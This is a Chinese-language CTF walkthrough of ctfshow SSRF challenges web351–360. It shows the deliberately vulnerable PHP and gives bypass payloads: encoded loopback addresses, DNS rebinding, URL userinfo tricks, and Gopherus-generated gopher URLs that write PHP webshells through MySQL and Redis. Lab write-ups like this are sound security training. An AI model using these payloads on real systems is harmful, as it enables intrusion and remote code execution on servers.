web351

1
2
3
4
5
6
7
8
9
10
11
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

其中,curl_init()函数用于初始化一个CURL对象,curl_setopt()函数用于设置CURL请求的选项,curl_exec()函数用于执行CURL请求并获取响应结果,curl_close()函数用于关闭CURL对象。

使用curl_setopt()函数设置了请求的URL、CURLOPT_RETURNTRANSFER选项和CURLOPT_HEADER选项。其中,CURLOPT_RETURNTRANSFER选项设置为1时,表示将获取的响应结果以字符串的形式返回。CURLOPT_HEADER选项设置为0时,则表示在响应结果中不包含响应头部信息。

payload

1
POST:url=http://127.0.0.1/flag.php

web352-353(回环地址绕过)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

parse_url函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$url = 'http://username:password@hostname/path?arg=value#anchor';
print_r(parse_url($url));
echo parse_url($url, PHP_URL_PATH);
输出:
Array
(
[scheme] => http
[host] => hostname
[user] => username
[pass] => password
[path] => /path
[query] => arg=value
[fragment] => anchor
)

可利用一个在线网站:IP地址转化为进制地址https://tool.520101.com/wangluo/jinzhizhuanhuan/

payload:

ip地址还可以用十进制,八进制,十六进制表示

1
2
3
4
5
6
url=http://0x7f.0.0.1/flag.php
url=http://0177.0.0.1/flag.php
url=http://0.0.0.0/flag.php 	     	 0.0.0.0代表本机
url=http://0x7F000001/flag.php  		16进制地址
url=http://2130706433/flag.php			10进制地址
url=http://127.1/flag.php

web354(DNS_A记录)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

方法一

DNS-Rebinding

利用下面这个网站

https://lock.cmpxchg8b.com/rebinder.html

可惜的域名里面有0和1

方法二

更改自己的域名的A记录为127.0.0.1

payload(注意dns缓存)

1
url=http://langblog.top/flag.php

补充

好像还可以用302重定向绕过

https://www.bilibili.com/video/BV1yN4y147qK/?spm_id_from=333.788&vd_source=556180919ced41bfcd02c06776ecf153

web355(长度限制)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

0在windows中被解析为0.0.0.0。在Linux中被解析为127.0.0.1

payload

1
2
url=http://0/flag.php
url=http://127.01/flag.php

web356(长度限制)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=3)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

payload

1
url=http://0/flag.php

web357(DNS Rebinding)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}


echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?>

gethostbyname函数用于获取指定主机名的IP地址。在这里,$x[‘host’]是一个数组$x中的元素,[‘host’]是数组$x中的一个键。这行代码的作用是将$x[‘host’]对应的主机名解析为IP地址,并将结果赋给变量$ip。

!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)

作用是检查变量$ip是否为一个合法的公共IP地址,如果不是,则输出’ip!’并终止程序。具体来说,它使用了PHP中的filter_var函数,结合了FILTER_VALIDATE_IP、FILTER_FLAG_NO_PRIV_RANGE和FILTER_FLAG_NO_RES_RANGE三个过滤器。这些过滤器的作用是验证IP地址的格式,并排除私有IP地址和保留IP地址

利用DNS Rebinding可以绕过第一次的检查

DNS重新绑定是计算机攻击的一种形式。 在这种攻击中,恶意网页会导致访问者运行客户端脚本,攻击网络上其他地方的计算机。 从理论上讲,同源策略可防止发生这种情况:客户端脚本只能访问为脚本提供服务的同一主机上的内容。 比较域名是实施此策略的重要部分,因此DNS重新绑定通过滥用域名系统(DNS)来绕过这种保护。
这种攻击可以通过让受害者的网络浏览器访问专用IP地址的机器并将结果返回给攻击者来破坏专用网络。 它也可以用于使用受害者机器发送垃圾邮件,分布式拒绝服务攻击或其他恶意活动。

payload

1
web354的方法一

web358(URL bypass)

1
2
3
4
5
6
7
8
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}

正则表达式的意思是以http://ctf.开头,以show结尾。

1
2
3
4
5
6
┌──(root㉿kali)-[/var/www/html]
└─# echo "flag{this is test }" > flag.php
                                                                                          
┌──(root㉿kali)-[/var/www/html]
└─# curl http://ctf.@127.0.0.1/flag.php?show
flag{this is test }

ctf.当成username,不影响地址解析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
$url="http://ctf.@127.0.0.1/flag.php?show";
$url=parse_url($url);
var_dump($url);
?>

array(5) {
  ["scheme"]=>
  string(4) "http"
  ["host"]=>
  string(9) "127.0.0.1"
  ["user"]=>
  string(4) "ctf."
  ["path"]=>
  string(9) "/flag.php"
  ["query"]=>
  string(4) "show"
}

payload

1
http://ctf.@127.0.0.1/flag.php?show

web359(Mysql)

1
2
3
4
5
6
7
8
9
</div>
		<form action="check.php" method="post">
				<input name="u" type="text" class="text" value="Username" onfocus="this.value = '';" onblur="if (this.value == '') {this.value = 'Username';}" >
					<div class="key">
				<input password="p" type="password" value="Password" onfocus="this.value = '';" onblur="if (this.value == '') {this.value = 'Password';}">
					</div>
				<input type="hidden" name="returl" value="https://404.chall.ctf.show/">
		
<div class="signin">

利用点在returl,利用gopherus工具打无密码mysql,并且知道数据库的username;

在非交互模式下登录并操作MySQL只能在无需密码认证情况下进行,

1
2
3
4
5
./gopherus.py --exploit mysql

username:root
写入一句话木马
select "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/shell.php';

payload

1
gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254f%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2527%2563%256d%2564%2527%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2573%2568%2565%256c%256c%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501

web360(redis)

1
2
3
4
5
6
7
8
9
10
11
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

题目提示了打redis,

尝试往web目录写webshell

利用gopherus

1
2
3
4
5
6
7
8
9
10
11
./gopherus.py --exploit redis

What do you want?? (ReverseShell/PHPShell): phpshell

Give web root location of server (default is /var/www/html):                              
Give PHP Payload (We have default PHP Shell): 

Your gopher link is Ready to get PHP Shell:                                               
                                                                                          
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A